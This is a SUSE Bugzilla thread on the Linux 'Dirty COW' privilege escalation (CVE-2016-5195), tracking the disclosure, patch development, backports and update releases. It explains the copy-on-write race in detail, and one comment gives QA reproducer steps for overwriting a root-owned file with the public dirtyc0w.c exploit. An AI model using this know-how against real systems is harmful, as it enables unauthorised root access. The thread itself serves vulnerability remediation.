Bugzilla – Bug 1004418
VUL-0: CVE-2016-5195: kernel: local privilege escalation using MAP_PRIVATE "Dirty COW"
Last modified: 2021-08-25 09:49:44 UTC
via distros From: Andy Lutomirski <luto@amacapital.net> Hi all- CVE-2016-5195 is a Linux privilege escalation bug. It probably affects all architectures and many versions. It is being actively exploited in the wild.Hi all- CVE-2016-5195 is a Linux privilege escalation bug. It probably affects all architectures and many versions. It is being actively exploited in the wild. The attached test case is something I wrote in 15 minutes this evening. It's bed time and I haven't tried to weaponize it, so I'm not 100% sure it works. There's a patch in testing. I don't know yet whether there will be an embargo. In the mean time, please don't share the test case. Credit for this exploit should not go to me. If anyone wants to step forward and claim credit, they're welcome to do so. --Andy The attached test case is something I wrote in 15 minutes this evening. It's bed time and I haven't tried to weaponize it, so I'm not 100% sure it works. There's a patch in testing. I don't know yet whether there will be an embargo. In the mean time, please don't share the test case. Credit for this exploit should not go to me. If anyone wants to step forward and claim credit, they're welcome to do so. --Andy
Is there any additional information on the sec mailing list?
no, that was all so far.
So the patch has not been shared yet?
no, not yet.
I am trying to wrap my head around this but have to admit a failure so far. get_user_pages_remote triggered when we are writing to /proc/<pid>/mem will imply FOLL_FORCE which means that check_vma_flags will not fail with EFAULT as one would expect because the VMA backing the private mapping is not opened for write. So we continue to follow_page_mask which does the page table walk. We will get two possible results - page is mapped and pte read only pointing to the pagecache page if the main thread hasn't done madvise MADV_DONTNEED yet and keeps still continues the read fault - page is not present - aka madvise was faster In both cases follow_page_pte should return with NULL - no present case is trivial - CoW case will rely on follow_page_pte doing if ((flags & FOLL_WRITE) && !pte_write(pte)) { pte_unmap_unlock(ptep, ptl); return NULL; } and we should go to the page fault path - faultin_page(). handle_pte_fault would handle CoW in the first case and do_fault() should make sure to do the CoW on a write access in the later case. In any case we should get a private page. Something went south apparently as we in fact manage to write to the pagecache page somehow. Maybe the read fault hasn't marked the pte properly. I will continue staring to the code...
bugbot adjusting priority
CRD: 2016-10-20 23:59
was also received via distros
Boris or Michal, please commit it to cve/linux-3.12 on top of tag rpm-3.12.60-52.54. That way, we can merge it easily for SLE12-LTSS and SLE12-SP1 fast-path. For SLE12-SP2, just use the tip of the branch.
OK, I finally understand what is going on here. I was just too focused on the page fault path which is apparently OK. It is g-u-p which gets confused faultin_page handle_mm_fault __handle_mm_fault handle_pte_fault do_fault <- pte is not present do_cow_fault <- FAULT_FLAG_WRITE alloc_set_pte maybe_mkwrite(pte_mkdirty(entry), vma) <- mark the page dirty but keep it RO # Returns with 0 and retry follow_page_mask follow_page_pte (flags & FOLL_WRITE) && !pte_write(pte) <- retry fault faultin_page handle_mm_fault __handle_mm_fault handle_pte_fault FAULT_FLAG_WRITE && !pte_write do_wp_page PageAnon() <- this is CoWed page already reuse_swap_page <- page is exclusively ours wp_page_reuse maybe_mkwrite <- dirty but RO again ret = VM_FAULT_WRITE ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) <- we drop FOLL_WRITE # Returns with 0 and retry as a read fault cond_resched -> different thread will now unmap via madvise follow_page_mask !pte_present && pte_none faultin_page handle_mm_fault __handle_mm_fault handle_pte_fault do_fault <- pte is not present do_read_fault <- this is a read fault and we will get pagecache page! The patch works because the pte will be always dirty for CoWed page while it is clean for the shared page pte (aka not write fault).
(In reply to Michal Marek from comment #13) > Boris or Michal, please commit it to cve/linux-3.12 on top of tag > rpm-3.12.60-52.54. That way, we can merge it easily for SLE12-LTSS and > SLE12-SP1 fast-path. > > For SLE12-SP2, just use the tip of the branch. I will take care of this I just have to double check the s390 and dirty bit part. I am also thinking whether there is a simpler solution.
For cve/linux-3.0, use commit 574c4a7ce1d3 ("aacraid: Check size values after double-fetch from user (CVE-2016-6480 bsc#991608).") (git log origin/cve/linux-3.0 --not origin/scripts $(git describe --abbrev=0 origin/SLE11-SP4 origin/SLE11-SP3-LTSS origin/SLE11-SP2-LTSS) | tail; find the parent of the last commit shown).
And just for the reference. I believe it is abf09bed3cce ("s390/mm: implement software dirty bits") which is necessary for s390 to handle pte_dirty properly and unfortunately this is 3.9. So we cannot rely on pte_dirty on anything older AFAIU. I have an alternative fix which I have posted to Linus privately. If I got it right we should be OK without pte_dirty as well, but I am currently not sure that I made all the details right. The fix looks as follows. The primary idea is that if we want FOLL_WRITE && FOLL_FORCE on read only mapping then we must see anonymous (aka post CoW page). So checking for PageAnon should be OK AFAICS. This passes the test but as I've said, I might have missed some subtle details. --- diff --git a/mm/gup.c b/mm/gup.c index 96b2b2fd0fbd..ff198c5424c1 100644 --- a/mm/gup.c +++ b/mm/gup.c @@ -95,10 +95,6 @@ static struct page *follow_page_pte(struct vm_area_struct *vma, } if ((flags & FOLL_NUMA) && pte_protnone(pte)) goto no_page; - if ((flags & FOLL_WRITE) && !pte_write(pte)) { - pte_unmap_unlock(ptep, ptl); - return NULL; - } page = vm_normal_page(vma, address, pte); if (!page && pte_devmap(pte) && (flags & FOLL_GET)) { @@ -129,6 +125,14 @@ static struct page *follow_page_pte(struct vm_area_struct *vma, } } + /* + * Make sure we will never return a shared page and we + * must have passed through CoW + */ + if ((flags & FOLL_FORCE) && (flags & FOLL_WRITE) && !(vma->vm_flags & VM_WRITE)) + if (!PageAnon(page)) + goto no_page; + if (flags & FOLL_SPLIT && PageTransCompound(page)) { int ret; get_page(page); @@ -402,17 +406,6 @@ static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma, return -EBUSY; } - /* - * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when - * necessary, even if maybe_mkwrite decided not to set pte_write. We - * can thus safely do subsequent page lookups as if they were reads. - * But only do so when looping for pte_write is futile: in some cases - * userspace may also be wanting to write to the gotten user page, - * which a read fault here might prevent (a readonly page might get - * reCOWed by userspace write). - */ - if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) - *flags &= ~FOLL_WRITE; return 0; }
(In reply to Michal Hocko from comment #18) [...] > diff --git a/mm/gup.c b/mm/gup.c > index 96b2b2fd0fbd..ff198c5424c1 100644 > --- a/mm/gup.c > +++ b/mm/gup.c > @@ -95,10 +95,6 @@ static struct page *follow_page_pte(struct vm_area_struct > *vma, > } > if ((flags & FOLL_NUMA) && pte_protnone(pte)) > goto no_page; > - if ((flags & FOLL_WRITE) && !pte_write(pte)) { > - pte_unmap_unlock(ptep, ptl); > - return NULL; > - } This is not correct. I really have to preserve the pte_write check. So it seems like we will end up with the Linus patch and only do the following for pre 3.9 kernels differently. But let me think about that some more. @@ -60,6 +60,24 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address, return -EEXIST; } +static inline bool exclusive_anon_page(struct page *page) +{ + return PageAnon(page) && page_mapcount(page) == 1; +} + +static inline bool can_follow_write_pte(pte_t pte, struct page *page, + unsigned int flags) +{ + if (pte_write(pte)) + return true; + + /* Make sure that we are really following CoWed page */ + if ((flags & FOLL_FORCE) && (flags & FOLL_COW)) + return page && exclusive_anon_page(page); + + return false; +} + static struct page *follow_page_pte(struct vm_area_struct *vma, unsigned long address, pmd_t *pmd, unsigned int flags) { @@ -95,12 +113,11 @@ static struct page *follow_page_pte(struct vm_area_struct *vma, } if ((flags & FOLL_NUMA) && pte_protnone(pte)) goto no_page; - if ((flags & FOLL_WRITE) && !pte_write(pte)) { - pte_unmap_unlock(ptep, ptl); - return NULL; - } page = vm_normal_page(vma, address, pte); + if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, page, flags)) + goto no_page; + if (!page && pte_devmap(pte) && (flags & FOLL_GET)) { /* * Only return device mapping pages in the FOLL_GET case since
While we were discussing over weekend it turned out (thanks to Hugh) that we are not affected prior to 2.6.22 because madvise used the exclusive mmap_sem before 0a27a14a6292 ("mm: madvise avoid exclusive mmap_sem"). So cve/linux-2.6.16 is not affected. Newer kernels are, sadly. We are still not settled whether to go with Linus' pte_dirty fix or mine based on PageAnon. Anyway both should be OK and if the upstream decides to go with Linus' one I will use PageAnon for our pre 3.9 kernels because pte_dirty wouldn't work for s390.
Created attachment 697591 [details] PageAnon based patch this patch should be more easier to backport to older kernels as it doesn't depend on pte_dirty check which was a problem on pre 3.9 s390 kernels.
Created attachment 697810 [details] Linus fix This will most probably end up in the Linus tree and I will push it for everything 3.9+ we have
Do you have an ETA for the submits?
(In reply to Johannes Segitz from comment #23) > Do you have an ETA for the submits? I will have patches ready by this noon.
Fixes are in users/mhocko/SLE12-SP2/bnc1004418_EMBARGO users/mhocko/cve/linux-3.12/bnc1004418_EMBARGO - SLE12-LTSS and SLE12-SP1 can pull all of them are should be merge-able to the last released kernel therefore appropriate for a fast track update with a single fix. Others will follow
users/mhocko/cve/linux-3.0/bnc1004418_EMBARGO - SLE11-SP3-TD, SLE11-SP[23]-LTSS and SLE11-SP4 can pull users/mhocko/cve/linux-2.6.32/bnc1004418_EMBARGO - SLE11-SP1-TD can pull
Yes. And 42.2 will get it via SLE12-SP2. The question is, whether to do fast path or regular update for openSUSE.
for opensuse we can do a regular update as the QA turnaround is quicker.
Are we able to submit an embargoed fix for openSUSE? Via IBS perhaps?
No. There is the potential of having read-protected OBS projects, but then you can not do requestrs from them. For openSUSE I would suggest submitting directly after embargoe end. (sadly, aarchg64 will waste a lot of time during building the update again, delaying it ... but well.)
(In reply to Marcus Meissner from comment #29) > for opensuse we can do a regular update as the QA turnaround is quicker. OK, I have pushed the fix to users/mhocko/openSUSE-42.1/bnc1004418_EMBARGO and users/mhocko/openSUSE-13.2/bnc1004418_EMBARGO they are both based on the last maint. update just in case. 42.2 can pull from SLE12-SP2 embargo branch. So we should be done here.
(In reply to Michal Hocko from comment #25) > Fixes are in > users/mhocko/SLE12-SP2/bnc1004418_EMBARGO > users/mhocko/cve/linux-3.12/bnc1004418_EMBARGO The patches in these branches seem to have the wrong subject line (without colon). Could you fix them? Nowadays scripts/log catches and complains it :)
(In reply to Michal Hocko from comment #25) > users/mhocko/cve/linux-3.12/bnc1004418_EMBARGO - SLE12-LTSS and SLE12-SP1 > can pull Please commit on top of rpm-3.12.60-52.54.
(In reply to Takashi Iwai from comment #33) > (In reply to Michal Hocko from comment #25) > > Fixes are in > > users/mhocko/SLE12-SP2/bnc1004418_EMBARGO > > users/mhocko/cve/linux-3.12/bnc1004418_EMBARGO > > The patches in these branches seem to have the wrong subject line (without > colon). Could you fix them? Nowadays scripts/log catches and complains it > :) Fixed (In reply to Michal Marek from comment #34) > (In reply to Michal Hocko from comment #25) > > users/mhocko/cve/linux-3.12/bnc1004418_EMBARGO - SLE12-LTSS and SLE12-SP1 > > can pull > > Please commit on top of rpm-3.12.60-52.54. ups I've screwed the base for the commit. Rebased on top of this tag. Sorry about that.
the patch is public commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 Author: Linus Torvalds <torvalds@linux-foundation.org> Date: Thu Oct 13 13:07:36 2016 -0700 mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
No OSS posting, but public via other distros and git.
FWIW landed in 3.12.66, 4.8.3, 4.7.9 and 4.4.26.
This is an autogenerated message for OBS integration: This bug (1004418) was mentioned in https://build.opensuse.org/request/show/436495 42.1 / kernel-source https://build.opensuse.org/request/show/436499 42.2 / kernel-source https://build.opensuse.org/request/show/436500 42.2 / kernel-source
This is an autogenerated message for OBS integration: This bug (1004418) was mentioned in https://build.opensuse.org/request/show/436513 13.1 / kernel-source
From Solar Designer on oss-sec Hi, This was brought to the linux-distros list (and briefly inadvertently to the distros list, although discussion continued on linux-distros only) on October 13 and it was made public yesterday, so it must be in here as well. Unfortunately, no one posted about it in here so far (the person who brought this to [linux-]distros must have done so!), and I don't have time to make a proper posting (with full detail in the message itself, as per oss-security list content guidelines), but I figured it's better for me to post something than nothing at all. Red Hat's description: "A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system." https://access.redhat.com/security/cve/cve-2016-5195 https://bugzilla.redhat.com/show_bug.cgi?id=1384344 https://security-tracker.debian.org/tracker/CVE-2016-5195 http://www.v3.co.uk/v3-uk/news/2474845/linux-users-urged-to-protect-against-dirty-cow-security-flaw https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 https://lkml.org/lkml/2016/10/19/860 https://dirtycow.ninja https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails https://twitter.com/DirtyCOWVuln Alexander
Codename, website, reproducer and logo ... http://dirtycow.ninja/
Created attachment 698546 [details] dirtyc0w.c QA REPRODUCER: gcc -pthread -o dirtyc0w dirtyc0w.c -O2 -Wall as root: create a file /etc/foo with content "test" as user: cat /etc/foo ./dirtyc0w /etc/foo "exploited" cat /etc/foo if /etc/foo is "exploited" afterwards, the reproducer worked.
This is an autogenerated message for OBS integration: This bug (1004418) was mentioned in https://build.opensuse.org/request/show/436657 Evergreen:11.4 / kernel-debug+kernel-default+kernel-desktop+kernel-docs+kernel-ec2+kernel-pae+kernel-source+kernel-syms+kernel-trace+kernel-vanilla+kernel-vmi+kernel-xen+preload
openSUSE-SU-2016:2583-1: An update that solves four vulnerabilities and has 21 fixes is now available. Category: security (important) Bug References: 1000287,1000304,1000907,1001462,1001486,1004418,1004462,1005101,799133,881008,909994,911687,922634,963655,972460,978094,979681,987703,991247,991665,993890,993891,996664,999600,999932 CVE References: CVE-2016-5195,CVE-2016-7039,CVE-2016-7425,CVE-2016-8658 Sources used: openSUSE Leap 42.1 (src): drbd-8.4.6-10.1, hdjmod-1.28-26.1, ipset-6.25.1-7.1, kernel-debug-4.1.34-33.1, kernel-default-4.1.34-33.1, kernel-docs-4.1.34-33.3, kernel-ec2-4.1.34-33.1, kernel-obs-build-4.1.34-33.1, kernel-obs-qa-4.1.34-33.1, kernel-obs-qa-xen-4.1.34-33.1, kernel-pae-4.1.34-33.1, kernel-pv-4.1.34-33.1, kernel-source-4.1.34-33.1, kernel-syms-4.1.34-33.1, kernel-vanilla-4.1.34-33.1, kernel-xen-4.1.34-33.1, lttng-modules-2.7.0-4.1, pcfclock-0.44-268.1, vhba-kmp-20140928-7.1
openSUSE-SU-2016:2584-1: An update that solves two vulnerabilities and has two fixes is now available. Category: security (important) Bug References: 1001419,1001486,1002165,1004418 CVE References: CVE-2016-5195,CVE-2016-8666 Sources used: openSUSE 13.1 (src): cloop-2.639-11.34.1, crash-7.0.2-2.34.1, hdjmod-1.28-16.34.1, ipset-6.21.1-2.38.1, iscsitarget-1.4.20.3-13.34.1, kernel-debug-3.12.62-55.1, kernel-default-3.12.62-55.1, kernel-desktop-3.12.62-55.1, kernel-docs-3.12.62-55.2, kernel-ec2-3.12.62-55.1, kernel-pae-3.12.62-55.1, kernel-source-3.12.62-55.1, kernel-syms-3.12.62-55.1, kernel-trace-3.12.62-55.1, kernel-vanilla-3.12.62-55.1, kernel-xen-3.12.62-55.1, ndiswrapper-1.58-35.1, openvswitch-1.11.0-0.41.1, pcfclock-0.44-258.35.1, vhba-kmp-20130607-2.34.1, virtualbox-4.2.36-2.66.1, xen-4.3.4_10-67.1, xtables-addons-2.3-2.33.1
SUSE-SU-2016:2585-1: An update that fixes one vulnerability is now available. Category: security (important) Bug References: 1004418 CVE References: CVE-2016-5195 Sources used: SUSE Linux Enterprise Software Development Kit 11-SP4 (src): kernel-docs-3.0.101-84.2 SUSE Linux Enterprise Server 11-SP4 (src): kernel-default-3.0.101-84.1, kernel-ec2-3.0.101-84.1, kernel-pae-3.0.101-84.1, kernel-ppc64-3.0.101-84.1, kernel-source-3.0.101-84.1, kernel-syms-3.0.101-84.1, kernel-trace-3.0.101-84.1, kernel-xen-3.0.101-84.1 SUSE Linux Enterprise Server 11-EXTRA (src): kernel-default-3.0.101-84.1, kernel-pae-3.0.101-84.1, kernel-ppc64-3.0.101-84.1, kernel-trace-3.0.101-84.1, kernel-xen-3.0.101-84.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): kernel-default-3.0.101-84.1, kernel-ec2-3.0.101-84.1, kernel-pae-3.0.101-84.1, kernel-ppc64-3.0.101-84.1, kernel-trace-3.0.101-84.1, kernel-xen-3.0.101-84.1
SUSE-SU-2016:2592-1: An update that solves one vulnerability and has 7 fixes is now available. Category: security (important) Bug References: 1001419,1002165,1004418,904970,907150,920615,920633,930408 CVE References: CVE-2016-5195 Sources used: SUSE Linux Enterprise Workstation Extension 12-SP1 (src): kernel-default-3.12.62-60.64.8.2 SUSE Linux Enterprise Software Development Kit 12-SP1 (src): kernel-docs-3.12.62-60.64.8.5, kernel-obs-build-3.12.62-60.64.8.3 SUSE Linux Enterprise Server 12-SP1 (src): kernel-default-3.12.62-60.64.8.2, kernel-source-3.12.62-60.64.8.2, kernel-syms-3.12.62-60.64.8.2, kernel-xen-3.12.62-60.64.8.2 SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.62-60.64.8.2 SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12-SP1_Update_8-1-2.2 SUSE Linux Enterprise Desktop 12-SP1 (src): kernel-default-3.12.62-60.64.8.2, kernel-source-3.12.62-60.64.8.2, kernel-syms-3.12.62-60.64.8.2, kernel-xen-3.12.62-60.64.8.2
SUSE-SU-2016:2593-1: An update that solves one vulnerability and has 7 fixes is now available. Category: security (important) Bug References: 1001419,1002165,1004418,904970,907150,920615,920633,930408 CVE References: CVE-2016-5195 Sources used: SUSE Linux Enterprise Server for SAP 12 (src): kernel-default-3.12.60-52.57.1, kernel-source-3.12.60-52.57.1, kernel-syms-3.12.60-52.57.1, kernel-xen-3.12.60-52.57.1, kgraft-patch-SLE12_Update_16-1-2.1 SUSE Linux Enterprise Server 12-LTSS (src): kernel-default-3.12.60-52.57.1, kernel-source-3.12.60-52.57.1, kernel-syms-3.12.60-52.57.1, kernel-xen-3.12.60-52.57.1, kgraft-patch-SLE12_Update_16-1-2.1 SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.60-52.57.1
Is ther any possibility for this to be exploited remotely?
SUSE-SU-2016:2596-1: An update that fixes one vulnerability is now available. Category: security (important) Bug References: 1004418 CVE References: CVE-2016-5195 Sources used: SUSE Linux Enterprise Server 11-SP2-LTSS (src): kernel-default-3.0.101-0.7.44.1, kernel-ec2-3.0.101-0.7.44.1, kernel-pae-3.0.101-0.7.44.1, kernel-source-3.0.101-0.7.44.1, kernel-syms-3.0.101-0.7.44.1, kernel-trace-3.0.101-0.7.44.1, kernel-xen-3.0.101-0.7.44.1 SUSE Linux Enterprise Debuginfo 11-SP2 (src): kernel-default-3.0.101-0.7.44.1, kernel-ec2-3.0.101-0.7.44.1, kernel-pae-3.0.101-0.7.44.1, kernel-trace-3.0.101-0.7.44.1, kernel-xen-3.0.101-0.7.44.1
(In reply to Robert Snow from comment #86) > Is ther any possibility for this to be exploited remotely? It really depends on what you mean by that. If you are able to get run a code as a local user by exploiting a vulnerability on a remotely accessible service then yes unless you are in such a restricted environment which prohibits access to the all the parts of the exploit (in other words whoever can call madvise and is allowed to open sensitive files and /proc/self/maps will be affected).
Just wondering if there's a timeline for SLES11 SP1 and SP3 LTSS packages? I've built my own in both cases using the patch that was used in the SP4 fix. The patch needed a little massaging for SP1 but in both cases the patched kernel appears resistant to the exploits online. My SP1 LTSS patch is here: https://www.dropbox.com/sh/jwlacynxok8ywoc/AAD1B2R4Wmdd1IR85NswIGERa/sles11_sp1_ltss.patch. If someone could take a look at the SP1 patch, that would be great! -Aaron
(In reply to Aaron Knister from comment #93) > Just wondering if there's a timeline for SLES11 SP1 and SP3 LTSS packages? > I've built my own in both cases using the patch that was used in the SP4 > fix. The patch needed a little massaging for SP1 but in both cases the > patched kernel appears resistant to the exploits online. My SP1 LTSS patch > is here: SLES 11 SP1 LTSS does not get proactive updates anymore, its EOL was AUgust 31 2015 (over 1 year ago). If you have an extended contract for it, contact your support agent. SLES 11 SP3 LTSS update will be released Monday (today).
Someone just pointed out on IRC it seems we have patches for openSUSE Evergreen but not 13.2 which is still under active support.
the kernel team had not submitted 13.2. I fetched current git yesterday and it is Currently building... hopefully can be released later Today.
As per comment#71, can we get a clear statement here? Is SLES 10 affected? If not, I would like to add a note to the TID to deflect questions in that area.
SUSE-SU-2016:2614-1: An update that fixes one vulnerability is now available. Category: security (important) Bug References: 1004418 CVE References: CVE-2016-5195 Sources used: SUSE OpenStack Cloud 5 (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-source-3.0.101-0.47.90.1, kernel-syms-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1 SUSE Manager Proxy 2.1 (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-source-3.0.101-0.47.90.1, kernel-syms-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1 SUSE Manager 2.1 (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-source-3.0.101-0.47.90.1, kernel-syms-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1 SUSE Linux Enterprise Server 11-SP3-LTSS (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-pae-3.0.101-0.47.90.1, kernel-source-3.0.101-0.47.90.1, kernel-syms-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1 SUSE Linux Enterprise Server 11-EXTRA (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-pae-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1 SUSE Linux Enterprise Point of Sale 11-SP3 (src): kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-pae-3.0.101-0.47.90.1, kernel-source-3.0.101-0.47.90.1, kernel-syms-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1 SUSE Linux Enterprise Debuginfo 11-SP3 (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-pae-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1
I tested both the /proc/self/mem and the PTRACE_POKEDATA based exploits from https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs on a SLES 10 machine and both did not result in exploitation. (Of course this is no explicit proof.)
openSUSE-SU-2016:2625-1: An update that solves 12 vulnerabilities and has 19 fixes is now available. Category: security (important) Bug References: 1000287,1001486,1003077,1003925,1003931,1004045,1004418,1004462,881008,909994,911687,922634,951155,960689,978094,980371,986570,989152,991247,991608,991665,993890,993891,994296,994520,994748,994752,994759,996664,999600,999932 CVE References: CVE-2015-7513,CVE-2015-8956,CVE-2016-0823,CVE-2016-1237,CVE-2016-5195,CVE-2016-5696,CVE-2016-6327,CVE-2016-6480,CVE-2016-6828,CVE-2016-7117,CVE-2016-7425,CVE-2016-8658 Sources used: openSUSE 13.2 (src): bbswitch-0.8-3.22.1, cloop-2.639-14.22.1, crash-7.0.8-22.1, hdjmod-1.28-18.23.1, ipset-6.23-22.1, kernel-debug-3.16.7-45.1, kernel-default-3.16.7-45.1, kernel-desktop-3.16.7-45.1, kernel-docs-3.16.7-45.2, kernel-ec2-3.16.7-45.1, kernel-obs-build-3.16.7-45.1, kernel-obs-qa-3.16.7-45.1, kernel-obs-qa-xen-3.16.7-45.1, kernel-pae-3.16.7-45.1, kernel-source-3.16.7-45.1, kernel-syms-3.16.7-45.1, kernel-vanilla-3.16.7-45.1, kernel-xen-3.16.7-45.1, pcfclock-0.44-260.22.1, vhba-kmp-20140629-2.22.1, virtualbox-5.0.28-54.2, xen-4.4.4_05-51.2, xtables-addons-2.6-24.1
SUSE-SU-2016:2632-1: An update that fixes two vulnerabilities is now available. Category: security (important) Bug References: 1004418,986362 CVE References: CVE-2016-4997,CVE-2016-5195 Sources used: SUSE Linux Enterprise Server for SAP 12 (src): kgraft-patch-SLE12_Update_10-6-2.1 SUSE Linux Enterprise Server 12-LTSS (src): kgraft-patch-SLE12_Update_10-6-2.1
openSUSE-SU-2016:2649-1: An update that solves 49 vulnerabilities and has 17 fixes is now available. Category: security (important) Bug References: 1004418,758540,816446,861093,917648,928130,935757,939826,942367,944296,945825,946117,946309,948562,949744,949936,951440,952384,953527,954404,955354,955654,956708,956709,958463,958886,958951,959190,959399,961500,961509,961512,963765,963767,964201,966437,966460,966662,966693,967972,967973,967974,967975,968010,968011,968012,968013,968670,969356,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971126,971360,972510,973570,975945,977847,978822 CVE References: CVE-2013-7446,CVE-2015-0272,CVE-2015-1339,CVE-2015-3339,CVE-2015-5307,CVE-2015-6252,CVE-2015-6937,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3134,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-4486,CVE-2016-5195 Sources used: openSUSE Evergreen 11.4 (src): kernel-debug-3.0.101-105.1, kernel-default-3.0.101-105.1, kernel-desktop-3.0.101-105.1, kernel-docs-3.0.101-105.2, kernel-ec2-3.0.101-105.1, kernel-pae-3.0.101-105.1, kernel-source-3.0.101-105.1, kernel-syms-3.0.101-105.1, kernel-trace-3.0.101-105.1, kernel-vanilla-3.0.101-105.1, kernel-vmi-3.0.101-105.1, kernel-xen-3.0.101-105.1, preload-1.2-6.83.1
The SLE(S/D) 12 SP2 Goldmaster candidates have this issue fixed, so SLE 12 SP2 is being delivered fixed to customers.
I am using openSUSE Leap 42.1 with kernel: uname -r 4.1.34-33-default Has it been fixed for my kernel version?
(In reply to Name Deleted from comment #133) > I am using openSUSE Leap 42.1 with kernel: > > uname -r > 4.1.34-33-default > > Has it been fixed for my kernel version? Yes, in comment #c97 is the release announcement for the 42.1 leap kernel with version 4.1.34-33.1. (the .1 is not shown in uname -r)
(In reply to Marcus Meissner from comment #135) Great. Thank you!
all kernel updates and live patches were released, ptfs are available for inactive older distributions.
An update workflow for this issue was started. This issue was rated as important. Please submit fixed packages until 2016-11-28. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/63212
An update workflow for this issue was started. This issue was rated as important. Please submit fixed packages until 2016-12-05. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/63229
openSUSE-SU-2016:3021-1: An update that solves 12 vulnerabilities and has 118 fixes is now available. Category: security (important) Bug References: 1000189,1000287,1000304,1000776,1001419,1001486,1002165,1003079,1003153,1003400,1003568,1003866,1003925,1004252,1004418,1004462,1004517,1004520,1005666,1006691,1007615,1007886,744692,772786,789311,799133,857397,860441,865545,866130,868923,874131,875631,876145,876463,898675,904489,909994,911687,915183,921338,921784,922064,922634,924381,924384,930399,931454,934067,937086,937888,940545,941420,946309,954986,955446,956514,959463,961257,962846,963655,963767,966864,967640,970943,971975,971989,974406,974620,975596,975772,976195,977687,978094,979451,979681,979928,982783,983619,984194,984419,984779,984992,985562,986445,987192,987333,987542,987565,987621,987805,988440,988617,988715,989152,989953,990245,991247,991608,991665,992244,992555,992591,992593,992712,993392,993841,993890,993891,994296,994438,994520,994748,994758,995153,995968,996664,997059,997299,997708,997896,998689,998795,998825,999577,999584,999600,999779,999907,999932 CVE References: CVE-2013-5634,CVE-2015-8956,CVE-2016-2069,CVE-2016-5696,CVE-2016-6130,CVE-2016-6327,CVE-2016-6480,CVE-2016-6828,CVE-2016-7042,CVE-2016-7097,CVE-2016-7425,CVE-2016-8658 Sources used: openSUSE 13.1 (src): cloop-2.639-11.36.1, crash-7.0.2-2.36.1, hdjmod-1.28-16.36.1, ipset-6.21.1-2.40.1, iscsitarget-1.4.20.3-13.36.1, kernel-debug-3.12.67-58.1, kernel-default-3.12.67-58.1, kernel-desktop-3.12.67-58.1, kernel-docs-3.12.67-58.2, kernel-ec2-3.12.67-58.1, kernel-pae-3.12.67-58.1, kernel-source-3.12.67-58.1, kernel-syms-3.12.67-58.1, kernel-trace-3.12.67-58.1, kernel-vanilla-3.12.67-58.1, kernel-xen-3.12.67-58.1, ndiswrapper-1.58-37.1, openvswitch-1.11.0-0.43.1, pcfclock-0.44-258.37.1, vhba-kmp-20130607-2.36.1, virtualbox-4.2.36-2.68.1, xen-4.3.4_10-69.1, xtables-addons-2.3-2.35.1
